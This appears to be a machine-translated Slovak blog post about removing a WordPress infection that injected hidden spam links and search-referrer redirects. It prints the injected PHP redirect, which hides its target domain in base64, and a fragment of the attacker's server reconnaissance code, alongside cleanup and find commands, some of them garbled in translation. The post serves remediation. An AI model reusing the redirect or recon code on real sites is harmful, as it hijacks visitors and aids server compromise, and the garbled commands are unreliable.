Za posledný mesiac sme dostali varovania vírus v blogu od niektorých návštevníkov. Spočiatku som ignoroval varovania, pretože som mal celkom dobrý antivírus (Kaspersky z roku 2009) a hoci som bol na blogu už dlho, nikdy som nedostal výstrahu vírusu (.. Videl som niečo podozrivé, čo pri prvom osviežení zmizlo. Nakoniec ...).
Pomaly sa pomaly začali javiť veľké variácie Preprava návštevníkov, po ktorom mi v poslednej dobe premávka neustále a stále viac a viac začala hovoriť utajenies.com je to vírusový. Včera som od niekoho dostal snímku obrazovky, keď antivírus zablokoval a skript od stealthsettings.com:Trójsky cliter.html.iframe.gr. Bol celkom presvedčivý, aby som ma hľadal vo všetkých zdrojoch. Prvou myšlienkou, ktorá prišla na myseľ, bolo urobiť upgrade v poslednej verzii WordPress (2.5.1), ale nie pred odstránením všetkých súborov starého skriptu WordPress a robiť zálohovanie v databáze. Tento postup nedal žiadny výsledok a pravdepodobne by mi trvalo dlho, kým mi dal krík, kde bub Eugen V diskusii o káve, ktorú našiel odkaz na Google a bolo by dobré to vidieť.
MyDigitalLife.info, uverejnili článok s názvom: “WordPress Hack: Obnovte a opravte Google a vyhľadávací nástroj alebo bez prenosu cookie na vaše potreby .info, AnyResults.net, Golden-info.net a ďalšie nelegálne stránky“, Aký je koniec drôtu, ktorý som potreboval.
Je to o a vykorisťovať WordPress na základe cookie, čo je podľa môjho názoru veľmi zložité a vyrobené ako kniha. Dostatočne inteligentný na to, aby urobil SQL injekcia V databáze blogu, Vytvorenie neviditeľného používateľa na jednoduchú rutinnú kontrolu Prístrojová doska->Užívatelia, Skontrolujte riaditelia servera a súbory „zapisovateľné“ (ktorí majú chmod 777), hľadať a vykonávať súbory so skupinovými oprávneniami alebo dokonca root. Neviem, aké je názov vykorisťovania, a vidím, že o ňom je málo písaných článkov, napriek tomu, že existuje veľa infikovaných blogov vrátane Rumunska. Dobre ... Pokúsim sa pokúsiť sa vysvetliť všeobecnosť tohto vírusu.
Čo robí vírus?
Po prvé, vkladá do zdrojov stránok na blogoch, neviditeľné odkazy pre návštevníkov, ale viditeľné a indexovateľné pre vyhľadávacie nástroje, najmä pre spoločnosť Google. Takto Prenos stránok na stránkach označený útočníkom. Po druhé, vloží sa ešte jeden Kód presmerovania URL, pre návštevníkov prichádzajúcich z Google, Live, Yahoo, ... alebo od čitateľa RSS a nemajú stránky v cookie. A antivírusový detekuje toto presmerovanie ako Trójsky cliker.html.
Príznaky:
Masívne zníženie premávky návštevníkov, najmä na blogoch, kde väčšina návštevníkov pochádza z Google.
Identifikovať: (Odtiaľ je problém komplikovaný pre tých, ktorí nevedia, koľko phpmyadmin, PHP a Linux)
. Opatrne !!! Najprv urobte zálohu v databáze !!!
1. Skontrolujte zdroje súborov index.php, hlavička, päta, z témy blogu a zistite, či existuje kód, ktorý používa šifrovanie základňa Alebo obsahuje „ak ($ ser ==“ 1? && Sief ($ _ cookie) == 0) "Forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... alebo niečo podobné. Odstráňte tento kód!
Kliknite na PE Predstavte si ...
Vo vyššie uvedenej snímke obrazovky som vybral z chyby a “<? php get_header (); ?>„Tento kód musí zostať.
2. Použite phpmyadmin a prejdite do databázy k tabuľke wp_users, kde skontrolujete, či existuje bezmenný používateľ, vytvorený k dátumu 00: 00: 00 0000-00-00 (V teréne je to možné user_login písať „WordPress“. Všimnite si ID tohto používateľa (pole ID) a potom ho utrite.
Kliknite na PE Predstavte si ...
*Ten na zelenej čiare musí byť odstránený a zachovaný. V jeho prípade ospalý, bol id = 8 .
3. Prejdite k stolu wp_usermeta, kde musíš nájsť si sa Vymazať riadky súvisiace s ID (kde v poli user_id Zobrazí sa hodnota odstráneného ID).
4. V tabuľke wp_option, ísť dovnútra Active_plugins A vidíte, aký doplnok je aktivovaný podozrivý. Môže používať finále ako _old.igeff, _old.pnggg, _old.jpeg, _new.php.piffatď. Kombinácie falošných rozšírení obrazu s _old a _New.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Vymazajte tento doplnok a potom prejdite na blog -> Prístrojová doska -> Pluginy, kde deaktivujete a aktivujete doplnok.
Kliknite na obrázok, pozrite si, ako sa zobrazí súbor vírusu v Active_plugins.
Postupujte cestou na FTP alebo SSH, označená v aktívach_plugins a odstráňte súbor na serveri.
5. Tiež v phpmyadmin, v tabuľke wp_option, Nájdite a odstráňte riadok obsahujúci “ris_f541b3abd05e7962fcab37737f40fad8„A riadok“internal_links_cache ”.
V Internal_links_cache, odkazy na spam, ktoré sa zobrazujú v blogu a jeden sú umiestnené Google AdSensehacker.
6. Odporúča sa zmeniť heslo protokolovania na blogu a SA Eliminujte všetkých podozrivých používateľov. Inovujte na najnovšiu verziu WordPress a nastavte blog tak, aby prestal registrovať nových používateľov. Neexistuje žiadna strata ... môžu komentovať a Unlog.
Skúsil som sa vysvetliť, koľko, čo sa má urobiť v takejto situácii, vyčistiť blog tohto vírusu. Problém je oveľa vážnejší, ako sa zdá a v žiadnom prípade nevyriešil, pretože sa používajú Zraniteľné miesta hostiteľského webového servera, na ktorom je blog.
Ako prvé bezpečnostné opatrenie, ktoré má prístup k Ssh, vykonať niektoré kontroly na serveri, aby ste zistili, či existuje viac súborov ako * _old * a * _New. * S zakončením.by, .jpeg, .pngg, .jpgg. Tieto súbory musia byť odstránené. Ak premenujeme súbor, napr. top_right_old.giff v top_right_old.php, vidíme, že v súbore je presne kód exploit servera.
Niektoré užitočné indikácie kontroly, čistenia a zabezpečenia servera. (cez SSH)
1. CD /TMP a skontrolujte, či existujú priečinky ako tmpvflma alebo iné kombinácie podobných mien a vymažte ich. Pozrite si na snímku obrazovky nižšie, dva také priečinky pre mňa:
RM –rf číselníka
2. Skontrolujte a eliminujte (zmeňte CHMOD) čo najviac priečinkov s atribútmi CHMOD 777
Nájdite všetky zapisovateľné súbory v aktuálnom DIR: nájsť. -Type f -perm -2 -ls
Nájdite všetky písané adresáre v aktuálnom Dir: nájsť. -Type D -Perm -2 -ls
Nájdite všetky zapisovateľné adresáre a súbory v aktuálnom DIR: nájsť. -Perm -2 –LS
3. Vyhľadajte podozrivé súbory na serveri.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, Opatrne !!! do súborov, ktoré nastavili bit Na juh a Korčuľovanie. Tieto súbory sa vykonávajú s oprávneniami používateľa (skupina) alebo root, nie s súborom používateľa, ktorý súbor vykoná. Tieto súbory môžu viesť k kompromisu, ak existujú bezpečnostné problémy. Ak nepoužívate súbory s bitami Suid a SGID, vykonajte “chmod 0 ” na nich alebo odinštalujte balík, ktorý ich obsahuje.
Využitie obsahuje niekde v zdroji ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}... V podstate týmto spôsobom nájde plemená v bezpečnosti. Otvorené porty, „zapisovateľných“ riaditelia a vykonávanie súborov so skupinami / root oprávneniami.
Vrátim sa s detailmi ...
Niektoré infikované blogy: www.blegoo.com, www.visurat.ro,
fulgerica.com, Denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kinnablog/,
Krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
Dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilimedia.ro/blog, blog.einvest.ro
... a zoznam môže pokračovať ... veľmi veľa.
Môžete skontrolovať, či je blog vírus, pomocou vyhľadávacieho nástroja Google. kopírovať & pasta:
Stránka: www.blegoo.com kúpiť
Dobré noci a zvýšenie na prácu;) Čoskoro si myslím, že Eugen príde, Previebible.imprevizible.com.
brb :)
AT: Pozor! Zmena témy WordPress alebo upgrade na WordPress 2.5.1 nie je riešením, ako sa zbaviť tohto vírusu.
